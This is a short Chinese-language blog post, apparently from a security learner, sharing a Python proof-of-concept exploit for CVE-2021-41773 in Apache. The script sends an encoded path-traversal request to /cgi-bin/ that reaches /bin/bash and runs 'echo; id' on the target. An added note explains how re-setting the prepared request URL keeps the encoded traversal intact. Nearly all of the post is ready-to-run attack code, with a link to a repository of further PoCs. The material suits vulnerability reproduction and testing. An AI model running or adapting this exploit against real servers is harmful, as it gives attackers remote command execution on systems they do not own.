Poc_CVE-2021-41773
DVWA的POC基本上结束了,其他的没写的也都是类似的,接下来就写一些已复现过的POC吧~
1 import sys 2 import time 3 import requests 4 5 def main(): 6 s = requests.Session() 7 try: 8 url = 'http://'+input('Please input your id:port,example:127.0.0.1:8080:')+'/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' 9 command = "echo; id" 10 req = requests.Request('POST', url=url, data=command) 11 prepare = req.prepare() 12 prepare.url = url 13 response = s.send(prepare, timeout=5) 14 output = response.text 15 print(output) 16 17 re = 'uid' 18 flag = re in str(output) 19 20 if flag: 21 print("It looks likely vulnerable") 22 else: 23 print("It is strong") 24 25 26 except: 27 print("Bye bye") 28 time.sleep(0.5) 29 sys.exit(1) 30 31 if __name__ == '__main__': 32 main()
注:因为post请求默认转发的地址已经经过了url编码,所以第一个写的url其实是解码后的/cgi-bin/../../../../../bin/bash,会被识别出来。所以这里使用的session,并且post包构造好后,在重新定义一下url,即可完成漏洞url的访问~
Github——https://github.com/wave-to/Poc/tree/main/Path_through